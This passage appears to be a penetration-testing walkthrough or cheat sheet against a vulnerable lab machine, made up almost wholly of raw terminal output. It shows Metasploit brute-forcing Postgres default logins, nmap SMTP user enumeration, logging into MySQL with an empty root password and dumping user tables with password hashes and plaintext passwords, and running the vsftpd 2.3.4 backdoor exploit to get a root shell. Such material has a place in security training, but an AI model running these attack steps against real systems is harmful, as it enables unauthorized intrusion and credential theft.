[*] Remote-IP-Address:5432 Postgres - [08/21] - Trying username:'admin' with password:'password' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':'password'
[-] Remote-IP-Address:5432 Postgres - [08/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [09/21] - Trying username:'' with password:'tiger' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':'tiger'
[-] Remote-IP-Address:5432 Postgres - [09/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [10/21] - Trying username:'' with password:'postgres' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':'postgres'
[-] Remote-IP-Address:5432 Postgres - [10/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [11/21] - Trying username:'' with password:'password' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':'password'
[-] Remote-IP-Address:5432 Postgres - [11/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [12/21] - Trying username:'' with password:'admin' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':'admin'
[-] Remote-IP-Address:5432 Postgres - [12/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [13/21] - Trying username:'scott' with password:'tiger' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'tiger'
[-] Remote-IP-Address:5432 Postgres - [13/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [14/21] - Trying username:'scott' with password:'postgres' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'postgres'
[-] Remote-IP-Address:5432 Postgres - [14/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [15/21] - Trying username:'scott' with password:'password' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'password'
[-] Remote-IP-Address:5432 Postgres - [15/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [16/21] - Trying username:'scott' with password:'admin' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'admin'
[-] Remote-IP-Address:5432 Postgres - [16/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [17/21] - Trying username:'admin' with password:'tiger' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':'tiger'
[-] Remote-IP-Address:5432 Postgres - [17/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [18/21] - Trying username:'admin' with password:'postgres' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':'postgres'
[-] Remote-IP-Address:5432 Postgres - [18/21] - Username/Password failed.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(postgres_login) >

root@bt:~# psql -h Remote-IP-Address -U postgres -W
Password for user postgres: postgres
psql (8.4.8, server 8.3.1)
WARNING: psql version 8.4, server version 8.3.
Some psql features might not work.
SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256)
Type "help" for help.

postgres=#

----------------------------------------------------------------------------------

port 25 - smtp

root@bt:~# nmap --script smtp-enum-users.nse -p 25,465,587 IP-Address

Starting Nmap 6.01 ( http://nmap.org ) at 1421-11-21 09:57 GMT
Nmap scan report for IP-Address
Host is up (0.00082s latency).
PORT STATE SERVICE
25/tcp open smtp
| smtp-enum-users:
| root
| admin
| administrator
| webadmin
| sysadmin
| netadmin
| guest
| user
| web
|_ test
465/tcp closed smtps
587/tcp closed submission
MAC Address: 01:02:03:04:05:06 (Micky Computer Systems)

----------------------------------------------------------------------------------

port 3306 - mysql (linux)

root@bt:/usr/local/share/nmap/scripts# nmap -p 3306 --script mysql-empty-password.nse External-IP-Address

Starting Nmap 6.25 ( http://nmap.org ) at 1741-01-04 17:19 GMT
Nmap scan report for External-IP-Address
Host is up (0.00053s latency).
PORT     STATE SERVICE
3306/tcp open  mysql
| mysql-empty-password:
|_  root account has empty password
MAC Address: 01:02:03:04:05:06 (Micky Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 16.61 seconds

root@bt:/usr/local/share/nmap/scripts# mysql --host=External-IP-Address
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 13
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.01 sec)

mysql> use dvwa;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

mysql> show tables;
+----------------+
| Tables_in_dvwa |
+----------------+
| guestbook      |
| users          |
+----------------+
2 rows in set (0.01 sec)

mysql> SELECT * FROM users;
+---------+------------+-----------+---------+----------------------------------+------------------------------------------------------+
| user_id | first_name | last_name | user    | password                         | avatar                                               |
+---------+------------+-----------+---------+----------------------------------+------------------------------------------------------+
|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | http://IP-Address/dvwa/hackable/users/admin.jpg   |
|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | http://IP-Address/dvwa/hackable/users/gordonb.jpg |
|       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | http://IP-Address/dvwa/hackable/users/1337.jpg    |
|       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | http://IP-Address/dvwa/hackable/users/pablo.jpg   |
|       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | http://IP-Address/dvwa/hackable/users/smithy.jpg  |
+---------+------------+-----------+---------+----------------------------------+------------------------------------------------------+
5 rows in set (0.00 sec)

mysql>

mysql>

mysql> use owasp10
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

mysql> show tables;
+-------------------+
| Tables_in_owasp10 |
+-------------------+
| accounts |
| blogs_table |
| captured_data |
| credit_cards |
| hitlog |
| pen_test_tools |
+-------------------+
6 rows in set (0.00 sec)

mysql> SELECT * FROM accounts;
+-----+----------+--------------+-----------------------------+----------+
| cid | username | password | mysignature | is_admin |
+-----+----------+--------------+-----------------------------+----------+
| 1 | admin | adminpass | Monkey! | TRUE |
| 2 | adrian | somepassword | Zombie Films Rock! | TRUE |
| 3 | john | monkey | I like the smell of confunk | FALSE |
| 4 | jeremy | password | d1373 1337 speak | FALSE |
| 5 | bryce | password | I Love SANS | FALSE |
| 6 | samurai | samurai | Carving Fools | FALSE |
| 7 | jim | password | Jim Rome is Burning | FALSE |
| 8 | bobby | password | Hank is my dad | FALSE |
| 9 | simba | password | I am a cat | FALSE |
| 10 | dreveil | password | Preparation H | FALSE |
| 11 | scotty | password | Scotty Do | FALSE |
| 12 | cal | password | Go Wildcats | FALSE |
| 13 | john | password | Do the Duggie! | FALSE |
| 14 | kevin | 42 | Doug Adams rocks | FALSE |
| 15 | dave | set | Bet on S.E.T. FTW | FALSE |
| 16 | ed | pentest | Commandline KungFu anyone? | FALSE |
+-----+----------+--------------+-----------------------------+----------+
16 rows in set (0.18 sec)

mysql>

----------------------------------------------------------------------------------

port 21 - FTP (linux)
root@bt:~# nmap -sC -sT -v IP-Address

PORT STATE SERVICE
21/tcp open ftp
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)

------------------------------------------------

msf auxiliary(vnc_login) > use auxiliary/scanner/ftp/ftp_version

msf auxiliary(ftp_version) > set rhosts IP-Address

msf auxiliary(ftp_version) > run

[*] IP-Address:21 FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

------------------------------------------------

msf auxiliary(ftp_version) > search vsFTPd

Matching Modules
================


Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 00:00:00 UTC excellent VSFTPD v2.3.4 Backdoor Command Execution

------------------------------------------------

msf > use exploit/unix/ftp/vsftpd_234_backdoor

msf exploit(vsftpd_234_backdoor) > set rhost IP-Address

msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (IP-Address:44113 -> IP-Address:6200) at 1421-01-12 01:45:51 +0000

ls -l

drwxr-xr-x 2 root root 4096 May 13 1421 bin
drwxr-xr-x 4 root root 1024 May 13 1421 boot
lrwxrwxrwx 1 root root 11 Apr 28 1421 cdrom -> media/cdrom
drwxr-xr-x 14 root root 13480 Jan 25 05:46 dev
drwxr-xr-x 95 root root 4096 Jan 25 05:47 etc
drwxr-xr-x 6 root root 4096 Apr 16 1421 home